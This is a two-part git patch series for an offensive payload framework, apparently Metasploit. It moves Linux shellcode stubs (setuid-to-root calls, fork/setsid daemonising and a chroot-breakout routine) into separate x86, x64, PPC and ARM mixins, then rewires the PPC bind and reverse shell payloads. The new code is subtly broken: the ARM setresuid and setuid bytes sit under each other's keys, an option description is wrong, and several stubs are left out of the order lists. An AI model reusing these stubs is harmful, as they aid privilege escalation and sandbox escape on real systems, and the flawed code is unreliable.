From 0d632777fcb4692828b40747823c63e7bcf57ff6 Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Thu, 19 Dec 2024 10:54:29 -0500 Subject: [PATCH 01/12] fix: splitting linux prepends to arch-specific mixins --- lib/msf/core/payload/linux.rb | 445 +------------------ lib/msf/core/payload/linux/armle/prepends.rb | 35 ++ lib/msf/core/payload/linux/ppc/prepends.rb | 74 +++ lib/msf/core/payload/linux/prepends.rb | 46 ++ lib/msf/core/payload/linux/x64/prepends.rb | 130 ++++++ lib/msf/core/payload/linux/x86/prepends.rb | 117 +++++ 6 files changed, 404 insertions(+), 443 deletions(-) create mode 100644 lib/msf/core/payload/linux/armle/prepends.rb create mode 100644 lib/msf/core/payload/linux/ppc/prepends.rb create mode 100644 lib/msf/core/payload/linux/prepends.rb create mode 100644 lib/msf/core/payload/linux/x64/prepends.rb create mode 100644 lib/msf/core/payload/linux/x86/prepends.rb diff --git a/lib/msf/core/payload/linux.rb b/lib/msf/core/payload/linux.rb index 55216e622e29..4c1816a0f036 100644 --- a/lib/msf/core/payload/linux.rb +++ b/lib/msf/core/payload/linux.rb @@ -8,454 +8,13 @@ # ### module Msf::Payload::Linux - # # This mixin is chained within payloads that target the Linux platform. # It provides special prepends, to support things like chroot and setuid. # - def initialize(info = {}) - ret = super(info) - - register_advanced_options( - [ - Msf::OptBool.new('PrependFork', - [ - false, - "Prepend a stub that starts the payload in its own process via fork", - "false" - ] - ), - Msf::OptBool.new('PrependSetresuid', - [ - false, - "Prepend a stub that executes the setresuid(0, 0, 0) system call", - "false" - ] - ), - Msf::OptBool.new('PrependSetreuid', - [ - false, - "Prepend a stub that executes the setreuid(0, 0) system call", - "false" - ] - ), - Msf::OptBool.new('PrependSetuid', - [ - false, - "Prepend a stub that executes the setuid(0) system call", - "false" - ] - ), - Msf::OptBool.new('PrependSetresgid', - [ - false, - "Prepend a stub that executes the setresgid(0, 0, 0) system call", - "false" - ] - ), - Msf::OptBool.new('PrependSetregid', - [ - false, - "Prepend a stub that executes the setregid(0, 0) system call", - "false" - ] - ), - Msf::OptBool.new('PrependSetgid', - [ - false, - "Prepend a stub that executes the setgid(0) system call", - "false" - ] - ), - Msf::OptBool.new('PrependChrootBreak', - [ - false, - "Prepend a stub that will break out of a chroot (includes setreuid to root)", - "false" - ] - ), - Msf::OptBool.new('AppendExit', - [ - false, - "Append a stub that executes the exit(0) system call", - "false" - ] - ), - ], Msf::Payload::Linux) - - ret - end - - def apply_prepends(buf) - pre = '' - app = '' - - test_arch = [ *(self.arch) ] - - # Handle all x86 code here - if (test_arch.include?(ARCH_X86)) - - # Prepend - - if (datastore['PrependFork']) - pre << "\x6a\x02" + # pushb $0x2 # - "\x58" + # popl %eax # - "\xcd\x80" + # int $0x80 ; fork # - "\x85\xc0" + # test %eax,%eax # - "\x74\x06" + # jz loc_000f # - # loc_0009: - "\x31\xc0" + # xor %eax,%eax # - "\xb0\x01" + # movb $0x1,%al # - "\xcd\x80" + # int $0x80 ; exit # - # loc_000f: - "\xb0\x42" + # movb %0x42,%al # - "\xcd\x80" + # int $0x80 ; setsid # - - "\x6a\x02" + # pushb $0x2 # - "\x58" + # popl %eax # - "\xcd\x80" + # int $0x80 ; fork # - "\x85\xc0" + # test %eax,%eax # - "\x75\xed" # jnz loc_0009 # - end - - if (datastore['PrependSetresuid']) - # setresuid(0, 0, 0) - pre << "\x31\xc9" + # xorl %ecx,%ecx # - "\x31\xdb" + # xorl %ebx,%ebx # - "\xf7\xe3" + # mull %ebx # - "\xb0\xa4" + # movb $0xa4,%al # - "\xcd\x80" # int $0x80 # - end - - if (datastore['PrependSetreuid']) - # setreuid(0, 0) - pre << "\x31\xc9" + # xorl %ecx,%ecx # - "\x31\xdb" + # xorl %ebx,%ebx # - "\x6a\x46" + # pushl $0x46 # - "\x58" + # popl %eax # - "\xcd\x80" # int $0x80 # - end - - if (datastore['PrependSetuid']) - # setuid(0) - pre << "\x31\xdb" + # xorl %ebx,%ebx # - "\x6a\x17" + # pushl $0x17 # - "\x58" + # popl %eax # - "\xcd\x80" # int $0x80 # - end - - if (datastore['PrependSetresgid']) - # setresgid(0, 0, 0) - pre << "\x31\xc9" + # xorl %ecx,%ecx # - "\x31\xdb" + # xorl %ebx,%ebx # - "\xf7\xe3" + # mull %ebx # - "\xb0\xaa" + # movb $0xaa,%al # - "\xcd\x80" # int $0x80 # - end - - if (datastore['PrependSetregid']) - # setregid(0, 0) - pre << "\x31\xc9" + # xorl %ecx,%ecx # - "\x31\xdb" + # xorl %ebx,%ebx # - "\x6a\x47" + # pushl $0x47 # - "\x58" + # popl %eax # - "\xcd\x80" # int $0x80 # - end - - if (datastore['PrependSetgid']) - # setgid(0) - pre << "\x31\xdb" + # xorl %ebx,%ebx # - "\x6a\x2e" + # pushl $0x2e # - "\x58" + # popl %eax # - "\xcd\x80" # int $0x80 # - end - - if (datastore['PrependChrootBreak']) - # setreuid(0, 0) - pre << "\x31\xc9" + # xorl %ecx,%ecx # - "\x31\xdb" + # xorl %ebx,%ebx # - "\x6a\x46" + # pushl $0x46 # - "\x58" + # popl %eax # - "\xcd\x80" # int $0x80 # - - # break chroot - pre << "\x6a\x3d" + # pushl $0x3d # - # build dir str (ptr in ebx) - "\x89\xe3" + # movl %esp,%ebx # - # mkdir(dir) - "\x6a\x27" + # pushl $0x27 # - "\x58" + # popl %eax # - "\xcd\x80" + # int $0x80 # - # chroot(dir) - "\x89\xd9" + # movl %ebx,%ecx # - "\x58" + # popl %eax # - "\xcd\x80" + # int $0x80 # - # build ".." str (ptr in ebx) - "\x31\xc0" + # xorl %eax,%eax # - "\x50" + # pushl %eax # - - "\x66\x68\x2e\x2e" + # pushw $0x2e2e # - "\x89\xe3" + # movl %esp,%ebx # - # loop changing dir - "\x6a\x3d" + # pushl $0x1e # - "\x59" + # popl %ecx # - "\xb0\x0c" + # movb $0xc,%al # - "\xcd\x80" + # int $0x80 # - "\xe2\xfa" + # loop -6 # - # final chroot - "\x6a\x3d" + # pushl $0x3d # - "\x89\xd9" + # movl %ebx,%ecx # - "\x58" + # popl %eax # - "\xcd\x80" # int $0x80 # - end - - # Append exit(0) - - if (datastore['AppendExit']) - app << "\x31\xdb" + # xorl %ebx,%ebx # - "\x6a\x01" + # pushl $0x01 # - "\x58" + # popl %eax # - "\xcd\x80" # int $0x80 # - end - - # Handle all Power/CBEA code here - elsif (test_arch.include?([ ARCH_PPC, ARCH_PPC64, ARCH_CBEA, ARCH_CBEA64 ])) - - # Prepend - - if (datastore['PrependSetresuid']) - # setresuid(0, 0, 0) - pre << "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\xa5\x2a\x78" + # xor r5,r5,r5 # - "\x7c\x84\x22\x78" + # xor r4,r4,r4 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\xa5" + # addi r0,r31,-347 # - "\x44\xff\xff\x02" # sc # - end - - if (datastore['PrependSetreuid']) - # setreuid(0, 0) - pre << "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\x84\x22\x78" + # xor r4,r4,r4 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\x47" + # addi r0,r31,-441 # - "\x44\xff\xff\x02" # sc # - end - - if (datastore['PrependSetuid']) - # setuid(0) - pre << "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\x18" + # addi r0,r31,-488 # - "\x44\xff\xff\x02" # sc # - end - - if (datastore['PrependSetresgid']) - # setresgid(0, 0, 0) - pre << "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\xa5\x2a\x78" + # xor r5,r5,r5 # - "\x7c\x84\x22\x78" + # xor r4,r4,r4 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\xab" + # addi r0,r31,-341 # - "\x44\xff\xff\x02" # sc # - end - - if (datastore['PrependSetregid']) - # setregid(0, 0) - pre << "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\x84\x22\x78" + # xor r4,r4,r4 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\x48" + # addi r0,r31,-440 # - "\x44\xff\xff\x02" # sc # - end - if (datastore['PrependSetgid']) - # setgid(0) - pre << "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\x2f" + # addi r0,r31,-465 # - "\x44\xff\xff\x02" # sc # - end - - if (datastore['PrependChrootBreak']) - # setreuid(0, 0) - pre << "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\x84\x22\x78" + # xor r4,r4,r4 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\x47" + # addi r0,r31,-441 # - "\x44\xff\xff\x02" # sc # - - # EEK! unsupported... - end - - # Append exit(0) - - if (datastore['AppendExit']) - app << "\x3b\xe0\x01\xff" + # li r31,511 # - "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # - "\x38\x1f\xfe\x02" + # addi r0,r31,-510 # - "\x44\xff\xff\x02" # sc # - end - - elsif (test_arch.include?(ARCH_X64)) - - if (datastore['PrependFork']) - # if (fork()) { exit(0); }; setsid(); if (fork()) { exit(0); }; - pre << "\x6a\x39" # push 57 ; __NR_fork # - pre << "\x58" # pop rax # - pre << "\x0f\x05" # syscall # - pre << "\x48\x85\xc0" # test rax,rax # - pre << "\x74\x08" # jz loc_0012 # - # # loc_000a: # - pre << "\x48\x31\xff" # xor rdi,rdi # - pre << "\x6a\x3c" # push 60 ; __NR_exit # - pre << "\x58" # pop rax # - pre << "\x0f\x05" # syscall # - # # loc_0012: # - pre << "\x04\x70" # add al, 112 ; __NR_setsid # - pre << "\x0f\x05" # syscall # - pre << "\x6a\x39" # push 57 ; __NR_fork # - pre << "\x58" # pop rax # - pre << "\x0f\x05" # syscall # - pre << "\x48\x85\xc0" # test rax,rax # - pre << "\x75\xea" # jnz loc_000a # - end - - if (datastore['PrependSetresuid']) - # setresuid(0, 0, 0) - pre << "\x48\x31\xff" # xor rdi,rdi # - pre << "\x48\x89\xfe" # mov rsi,rdi # - pre << "\x6a\x75" # push 0x75 # - pre << "\x58" # pop rax # - pre << "\x0f\x05" # syscall # - end - - if (datastore['PrependSetreuid']) - # setreuid(0, 0) - pre << "\x48\x31\xff" # xor rdi,rdi # - pre << "\x48\x89\xfe" # mov rsi,rdi # - pre << "\x48\x89\xf2" # mov rdx,rsi # - pre << "\x6a\x71" # push 0x71 # - pre << "\x58" # pop rax # - pre << "\x0f\x05" # syscall # - end - - if (datastore['PrependSetuid']) - # setuid(0) - pre << "\x48\x31\xff" # xor rdi,rdi # - pre << "\x6a\x69" # push 0x69 # - pre << "\x58" # pop rax # - pre << "\x0f\x05" # syscall # - end - - if (datastore['PrependSetresgid']) - # setresgid(0, 0, 0) - pre << "\x48\x31\xff" # xor rdi,rdi # - pre << "\x48\x89\xfe" # mov rsi,rdi # - pre << "\x6a\x77" # push 0x77 # - pre << "\x58" # pop rax # - pre << "\x0f\x05" # syscall # - end - - if (datastore['PrependSetregid']) - # setregid(0, 0) - pre << "\x48\x31\xff" # xor rdi,rdi # - pre << "\x48\x89\xfe" # mov rsi,rdi # - pre << "\x48\x89\xf2" # mov rdx,rsi # - pre << "\x6a\x72" # push 0x72 # - pre << "\x58" # pop rax # - pre << "\x0f\x05" # syscall # - end - - if (datastore['PrependSetgid']) - # setgid(0) - pre << "\x48\x31\xff" # xor rdi,rdi # - pre << "\x6a\x6a" # push 0x6a # - pre << "\x58" # pop rax # - pre << "\x0f\x05" # syscall # - end - - if (datastore['PrependChrootBreak']) - - # setreuid(0, 0) - pre << "\x48\x31\xff" # xor rdi,rdi # - pre << "\x48\x89\xfe" # mov rsi,rdi # - pre << "\x48\x89\xf8" # mov rax,rdi # - pre << "\xb0\x71" # mov al,0x71 # - pre << "\x0f\x05" # syscall # - - # generate temp dir name - pre << "\x48\xbf" # mov rdi, # - pre << Rex::Text.rand_text_alpha(8) # random # - pre << "\x56" # push rsi # - pre << "\x57" # push rdi # - - # mkdir(random,0755) - pre << "\x48\x89\xe7" # mov rdi,rsp # - pre << "\x66\xbe\xed\x01" # mov si,0755 # - pre << "\x6a\x53" # push 0x53 # - pre << "\x58" # pop rax # - pre << "\x0f\x05" # syscall # - - # chroot(random) - pre << "\x48\x31\xd2" # xor rdx,rdx # - pre << "\xb2\xa1" # mov dl,0xa1 # - pre << "\x48\x89\xd0" # mov rax,rdx # - pre << "\x0f\x05" # syscall # - - # build .. (ptr in rdi ) - pre << "\x66\xbe\x2e\x2e" # mov si,0x2e2e # - pre << "\x56" # push rsi # - pre << "\x48\x89\xe7" # mov rdi,rsp # - - # loop chdir(..) 69 times - # syscall tend to modify rcx can't use loop... - pre << "\x6a\x45" # push 0x45 # - pre << "\x5b" # pop rbx # - pre << "\x6a\x50" # push 0x50 # - pre << "\x58" # pop rax # - pre << "\x0f\x05" # syscall # - pre << "\xfe\xcb" # dec bl # - pre << "\x75\xf7" # jnz -7 # - - # chroot (.) (which should be /) - pre << "\x6a\x2e" # push . (0x2e) # - pre << "\x48\x89\xe7" # mov rdi,rsp # - pre << "\x48\x89\xd0" # mov rax,rdx # - pre << "\x0f\x05" # syscall # - - end - - # Append exit(0) - - if (datastore['AppendExit']) - app << "\x48\x31\xff" # xor rdi,rdi # - app << "\x6a\x3c" # push 0x3c # - app << "\x58" # pop rax # - app << "\x0f\x05" # syscall # - end - - elsif (test_arch.include?(ARCH_ARMLE)) - - if (datastore['PrependSetuid']) - # setuid(0) - pre << "\x00\x00\x20\xe0" # eor r0, r0, r0 # - pre << "\x17\x70\xa0\xe3" # mov r7, #23 # - pre << "\x00\x00\x00\xef" # svc # - end - - if (datastore['PrependSetresuid']) - # setresuid(ruid=0, euid=0, suid=0) - pre << "\x00\x00\x20\xe0" # eor r0, r0, r0 # - pre << "\x01\x10\x21\xe0" # eor r1, r1, r1 # - pre << "\x02\x20\x22\xe0" # eor r2, r2, r2 # - pre << "\xa4\x70\xa0\xe3" # mov r7, #0xa4 # - pre << "\x00\x00\x00\xef" # svc # - end - end - - return (pre + buf + app) + def initialize(info = {}) + super(info) end - end diff --git a/lib/msf/core/payload/linux/armle/prepends.rb b/lib/msf/core/payload/linux/armle/prepends.rb new file mode 100644 index 000000000000..90612a220791 --- /dev/null +++ b/lib/msf/core/payload/linux/armle/prepends.rb @@ -0,0 +1,35 @@ +module Msf + module Payload::Linux::Armle::Prepends + include Msf::Payload::Linux::Prepends + + def prepends_order + %w[PrependSetresuid PrependSetuid] + end + + def appends_order + %w[] + end + + def prepends_map + { + # 'PrependFork' => "", + + # setresuid(0, 0, 0) + 'PrependSetresuid' => "\x00\x00\x20\xe0" + # eor r0, r0, r0 # + "\x17\x70\xa0\xe3" + # mov r7, #23 # + "\x00\x00\x00\xef", # svc # + + # setuid(0) + 'PrependSetuid' => "\x00\x00\x20\xe0" + # eor r0, r0, r0 # + "\x01\x10\x21\xe0" + # eor r1, r1, r1 # + "\x02\x20\x22\xe0" + # eor r2, r2, r2 # + "\xa4\x70\xa0\xe3" + # mov r7, #0xa4 # + "\x00\x00\x00\xef" # svc # + } + end + + def appends_map + {} + end + end +end \ No newline at end of file diff --git a/lib/msf/core/payload/linux/ppc/prepends.rb b/lib/msf/core/payload/linux/ppc/prepends.rb new file mode 100644 index 000000000000..9379735f036d --- /dev/null +++ b/lib/msf/core/payload/linux/ppc/prepends.rb @@ -0,0 +1,74 @@ +module Msf + module Payload::Linux::Ppc::Prepends + include Msf::Payload::Linux::Prepends + + def prepends_order + %w[PrependSetresuid PrependSetreuid PrependSetuid PrependSetresgid PrependSetregid PrependSetgid] + end + + def appends_order + %w[AppendExit] + end + + def prepends_map + { + # 'PrependFork' => "", + + # setresuid(0, 0, 0) + 'PrependSetresuid' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\xa5\x2a\x78" + # xor r5,r5,r5 # + "\x7c\x84\x22\x78" + # xor r4,r4,r4 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\xa5" + # addi r0,r31,-347 # + "\x44\xff\xff\x02", # sc # + + # setreuid(0, 0) + 'PrependSetreuid' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\x84\x22\x78" + # xor r4,r4,r4 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\x47" + # addi r0,r31,-441 # + "\x44\xff\xff\x02", # sc # + + # setuid(0) + 'PrependSetuid' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\x18" + # addi r0,r31,-488 # + "\x44\xff\xff\x02", # sc # + + # setresgid(0, 0, 0) + 'PrependSetresgid' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\xa5\x2a\x78" + # xor r5,r5,r5 # + "\x7c\x84\x22\x78" + # xor r4,r4,r4 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\xab" + # addi r0,r31,-341 # + "\x44\xff\xff\x02", # sc # + + # setregid(0, 0) + 'PrependSetregid' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\x84\x22\x78" + # xor r4,r4,r4 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\x48" + # addi r0,r31,-440 # + "\x44\xff\xff\x02", # sc # + + # setgid(0) + 'PrependSetgid' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\x2f" + # addi r0,r31,-465 # + "\x44\xff\xff\x02" # sc # + + # setreuid(0, 0) = break chroot + # 'PrependChrootBreak' => + } + end + + def appends_map + { + # exit(0) + 'AppendExit' => "\x3b\xe0\x01\xff" + # li r31,511 # + "\x7c\x63\x1a\x78" + # xor r3,r3,r3 # + "\x38\x1f\xfe\x02" + # addi r0,r31,-510 # + "\x44\xff\xff\x02" # sc # + } + end + end +end \ No newline at end of file diff --git a/lib/msf/core/payload/linux/prepends.rb b/lib/msf/core/payload/linux/prepends.rb new file mode 100644 index 000000000000..05c9e658fe2a --- /dev/null +++ b/lib/msf/core/payload/linux/prepends.rb @@ -0,0 +1,46 @@ + +module Msf + module Payload::Linux::Prepends + + def initialize(info) + super(info) + register_prepend_options + end + + def register_prepend_options + all_options = { + 'PrependFork' => [false, 'Prepend a stub that starts the payload in its own process via fork', 'false'], + 'PrependSetresuid' => [false, 'Prepend a stub that executes the setresuid(0, 0, 0) system call', 'false'], + 'PrependSetreuid' => [false, 'Prepend a stub that executes the setreuid(0, 0) system call', 'false'], + 'PrependSetuid' => [false, 'Prepend a stub that executes the setuid(0) system call', 'false'], + 'PrependSetresgid' => [false, 'Prepend a stub that executes the setresgid(0, 0, 0) system call', 'false'], + 'PrependSetregid' => [false, 'Prepend a stub that executes the setregid(0, 0) system call', 'false'], + 'PrependSetgid' => [false, 'Prepend a stub that executes the setgid(0) system call', 'false'], + 'PrependChrootBreak' => [false, 'Prepend a stub that will break out of a chroot (includes setreuid to root)', 'false'], + 'AppendExit' => [false, 'Prepend a stub that will break out of a chroot (includes setreuid to root)', 'false'] + } + avaiable_options = [] + for prepend in prepends_order + avaiable_options.append(Msf::OptBool.new(prepend, all_options.fetch(prepend))) + end + for append in appends_order + avaiable_options.append(Msf::OptBool.new(append, all_options.fetch(append))) + end + register_advanced_options(avaiable_options, Msf::Payload::Linux) + end + + def apply_prepends(buf) + pre = '' + app = '' + for name in prepends_order.each + pre << prepends_map.fetch(name) if datastore[name] + end + for name in appends_order.each + app << appends_map.fetch(name) if datastore[name] + end + pre.force_encoding('ASCII-8BIT') + + buf.force_encoding('ASCII-8BIT') + + app.force_encoding('ASCII-8BIT') + end + end +end diff --git a/lib/msf/core/payload/linux/x64/prepends.rb b/lib/msf/core/payload/linux/x64/prepends.rb new file mode 100644 index 000000000000..8a1ae58a467a --- /dev/null +++ b/lib/msf/core/payload/linux/x64/prepends.rb @@ -0,0 +1,130 @@ +module Msf + module Payload::Linux::X64::Prepends + include Msf::Payload::Linux::Prepends + def prepends_order + %w[PrependFork PrependSetresuid PrependSetreuid PrependSetuid] + end + + def appends_order + %w[] + end + + def prepends_map + { 'PrependFork' => "\x6a\x39" + # push 57 ; __NR_fork # + "\x58" + # pop rax # + "\x0f\x05" + # syscall # + "\x48\x85\xc0" + # test rax,rax # + "\x74\x08" + # jz loc_0012 # + # loc_000a: # + "\x48\x31\xff" + # xor rdi,rdi # + "\x6a\x3c" + # push 60 ; __NR_exit # + "\x58" + # pop rax # + "\x0f\x05" + # syscall # + # loc_0012: # + "\x04\x70" + # add al, 112 ; __NR_setsid # + "\x0f\x05" + # syscall # + "\x6a\x39" + # push 57 ; __NR_fork # + "\x58" + # pop rax # + "\x0f\x05" + # syscall # + "\x48\x85\xc0" + # test rax,rax # + "\x75\xea", # jnz loc_000a # + + # setresuid(0, 0, 0) + 'PrependSetresuid' => "\x48\x31\xff" + # xor rdi,rdi # + "\x48\x89\xfe" + # mov rsi,rdi # + "\x6a\x75" + # push 0x75 # + "\x58" + # pop rax # + "\x0f\x05", # syscall # + + # setreuid(0, 0) + 'PrependSetreuid' => "\x48\x31\xff" + # xor rdi,rdi # + "\x48\x89\xfe" + # mov rsi,rdi # + "\x48\x89\xf2" + # mov rdx,rsi # + "\x6a\x71" + # push 0x71 # + "\x58" + # pop rax # + "\x0f\x05", # syscall # + + # setuid(0) + 'PrependSetuid' => "\x48\x31\xff" + # xor rdi,rdi # + "\x6a\x69" + # push 0x69 # + "\x58" + # pop rax # + "\x0f\x05", # syscall # + + # setresgid(0, 0, 0) + 'PrependSetresgid' => "\x48\x31\xff" + # xor rdi,rdi # + "\x48\x89\xfe" + # mov rsi,rdi # + "\x6a\x77" + # push 0x77 # + "\x58" + # pop rax # + "\x0f\x05", # syscall # + + # setregid(0, 0) + 'PrependSetregid' => "\x48\x31\xff" + # xor rdi,rdi # + "\x48\x89\xfe" + # mov rsi,rdi # + "\x48\x89\xf2" + # mov rdx,rsi # + "\x6a\x72" + # push 0x72 # + "\x58" + # pop rax # + "\x0f\x05", # syscall # + + # setgid(0) + 'PrependSetgid' => "\x48\x31\xff" + # xor rdi,rdi # + "\x6a\x6a" + # push 0x6a # + "\x58" + # pop rax # + "\x0f\x05", # syscall # + + # setreuid(0, 0) + break chroot + 'PrependChrootBreak' => "\x48\x31\xff" + # xor rdi,rdi # + "\x48\x89\xfe" + # mov rsi,rdi # + "\x48\x89\xf8" + # mov rax,rdi # + "\xb0\x71" + # mov al,0x71 # + "\x0f\x05" + # syscall # + # generate temp dir name + "\x48\xbf#{Rex::Text.rand_text_alpha(8)}" + # mov rdi, # + "\x56" + # push rsi # + "\x57" + # push rdi # + # mkdir(random,0755) + "\x48\x89\xe7" + # mov rdi,rsp # + "\x66\xbe\xed\x01" + # mov si,0755 # + "\x6a\x53" + # push 0x53 # + "\x58" + # pop rax # + "\x0f\x05" + # syscall # + + # chroot(random) + "\x48\x31\xd2" + # xor rdx,rdx # + "\xb2\xa1" + # mov dl,0xa1 # + "\x48\x89\xd0" + # mov rax,rdx # + "\x0f\x05" + # syscall # + + # build .. (ptr in rdi ) + "\x66\xbe\x2e\x2e" + # mov si,0x2e2e # + "\x56" + # push rsi # + "\x48\x89\xe7" + # mov rdi,rsp # + + # loop chdir(..) 69 times + # syscall tend to modify rcx can't use loop... + "\x6a\x45" + # push 0x45 # + "\x5b" + # pop rbx # + "\x6a\x50" + # push 0x50 # + "\x58" + # pop rax # + "\x0f\x05" + # syscall # + "\xfe\xcb" + # dec bl # + "\x75\xf7" + # jnz -7 # + + # chroot (.) (which should be /) + "\x6a\x2e" + # push . (0x2e) # + "\x48\x89\xe7" + # mov rdi,rsp # + "\x48\x89\xd0" + # mov rax,rdx # + "\x0f\x05" # syscall # + } + end + + def appends_map + { + # exit(0) + 'AppendExit' => "\x48\x31\xff" + # xor rdi,rdi # + "\x6a\x3c" + # push 0x3c # + "\x58" + # pop rax # + "\x0f\x05", # syscall # + } + end + end +end \ No newline at end of file diff --git a/lib/msf/core/payload/linux/x86/prepends.rb b/lib/msf/core/payload/linux/x86/prepends.rb new file mode 100644 index 000000000000..461d4b8c4fee --- /dev/null +++ b/lib/msf/core/payload/linux/x86/prepends.rb @@ -0,0 +1,117 @@ +module Msf + module Payload::Linux::X86::Prepends + def prepends_order + %w[PrependFork PrependSetresuid PrependSetreuid PrependSetuid PrependSetresgid PrependSetregid PrependSetgid PrependChrootBreak] + end + + def appends_order + %w[AppendExit] + end + def prepends_map + { + 'PrependFork' => "\x6a\x02" + # pushb $0x2 # + "\x58" + # popl %eax # + "\xcd\x80" + # int $0x80 ; fork # + "\x85\xc0" + # test %eax,%eax # + "\x74\x06" + # jz loc_000f # + # loc_0009: + "\x31\xc0" + # xor %eax,%eax # + "\xb0\x01" + # movb $0x1,%al # + "\xcd\x80" + # int $0x80 ; exit # + # loc_000f: + "\xb0\x42" + # movb %0x42,%al # + "\xcd\x80" + # int $0x80 ; setsid # + "\x6a\x02" + # pushb $0x2 # + "\x58" + # popl %eax # + "\xcd\x80" + # int $0x80 ; fork # + "\x85\xc0" + # test %eax,%eax # + "\x75\xed", # jnz loc_0009 # + + # setresuid(0, 0, 0) + 'PrependSetresuid' => "\x31\xc9" + # xorl %ecx,%ecx # + "\x31\xdb" + # xorl %ebx,%ebx # + "\xf7\xe3" + # mull %ebx # + "\xb0\xa4" + # movb $0xa4,%al # + "\xcd\x80", # int $0x80 # + + # setreuid(0, 0) + 'PrependSetreuid' => "\x31\xc9" + # xorl %ecx,%ecx # + "\x31\xdb" + # xorl %ebx,%ebx # + "\x6a\x46" + # pushl $0x46 # + "\x58" + # popl %eax # + "\xcd\x80", # int $0x80 # + + # setuid(0) + 'PrependSetuid' => "\x31\xdb" + # xorl %ebx,%ebx # + "\x6a\x17" + # pushl $0x17 # + "\x58" + # popl %eax # + "\xcd\x80", # int $0x80 # + + # setresgid(0, 0, 0) + 'PrependSetresgid' => "\x31\xc9" + # xorl %ecx,%ecx # + "\x31\xdb" + # xorl %ebx,%ebx # + "\xf7\xe3" + # mull %ebx # + "\xb0\xaa" + # movb $0xaa,%al # + "\xcd\x80", # int $0x80 # + + # setregid(0, 0) + 'PrependSetregid' => "\x31\xc9" + # xorl %ecx,%ecx # + "\x31\xdb" + # xorl %ebx,%ebx # + "\x6a\x47" + # pushl $0x47 # + "\x58" + # popl %eax # + "\xcd\x80", # int $0x80 # + + # setgid(0) + 'PrependSetgid' => "\x31\xdb" + # xorl %ebx,%ebx # + "\x6a\x2e" + # pushl $0x2e # + "\x58" + # popl %eax # + "\xcd\x80", # int $0x80 # + + # setreuid(0, 0) = break chroot + 'PrependChrootBreak' => "\x31\xc9" + # xorl %ecx,%ecx # + "\x31\xdb" + # xorl %ebx,%ebx # + "\x6a\x46" + # pushl $0x46 # + "\x58" + # popl %eax # + "\xcd\x80" + # int $0x80 # + "\x6a\x3d" + # pushl $0x3d # + # build dir str (ptr in ebx) + "\x89\xe3" + # movl %esp,%ebx # + # mkdir(dir) + "\x6a\x27" + # pushl $0x27 # + "\x58" + # popl %eax # + "\xcd\x80" + # int $0x80 # + # chroot(dir) + "\x89\xd9" + # movl %ebx,%ecx # + "\x58" + # popl %eax # + "\xcd\x80" + # int $0x80 # + # build ".." str (ptr in ebx) + "\x31\xc0" + # xorl %eax,%eax # + "\x50" + # pushl %eax # + + "\x66\x68\x2e\x2e" + # pushw $0x2e2e # + "\x89\xe3" + # movl %esp,%ebx # + # loop changing dir + "\x6a\x3d" + # pushl $0x1e # + "\x59" + # popl %ecx # + "\xb0\x0c" + # movb $0xc,%al # + "\xcd\x80" + # int $0x80 # + "\xe2\xfa" + # loop -6 # + # final chroot + "\x6a\x3d" + # pushl $0x3d # + "\x89\xd9" + # movl %ebx,%ecx # + "\x58" + # popl %eax # + "\xcd\x80" # int $0x80 # + } + end + + def appends_map + { + # exit(0) + 'AppendExit' => "\x31\xdb" + # xorl %ebx,%ebx # + "\x6a\x01" + # pushl $0x01 # + "\x58" + # popl %eax # + "\xcd\x80" # int $0x80 # + } + end + end +end \ No newline at end of file From 753447c7f772979e3f96ea388fbb971f2fcf5663 Mon Sep 17 00:00:00 2001 From: dledda-r7 Date: Thu, 19 Dec 2024 12:13:55 -0500 Subject: [PATCH 02/12] fix: updating ppc/shell to use the new mixin structure --- modules/payloads/singles/linux/ppc/shell_bind_tcp.rb | 2 +- modules/payloads/singles/linux/ppc/shell_find_port.rb | 2 +- modules/payloads/singles/linux/ppc/shell_reverse_tcp.rb | 2 +- 3 files changed, 3 insertions(+), 3 deletions(-) diff --git a/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb b/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb index d40e531e5486..6935f809ee44 100644 --- a/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb +++ b/modules/payloads/singles/linux/ppc/shell_bind_tcp.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 223 include Msf::Payload::Single - include Msf::Payload::Linux + include Msf::Payload::Linux::Ppc::Prepends include Msf::Sessions::CommandShellOptions def initialize(info = {}) diff --git a/modules/payloads/singles/linux/ppc/shell_find_port.rb b/modules/payloads/singles/linux/ppc/shell_find_port.rb index 5246b984bb7c..5f9a1e4900e3 100644 --- a/modules/payloads/singles/linux/ppc/shell_find_port.rb +++ b/modules/payloads/singles/linux/ppc/shell_find_port.rb @@ -9,7 +9,7 @@ module MetasploitModule CachedSize = 171 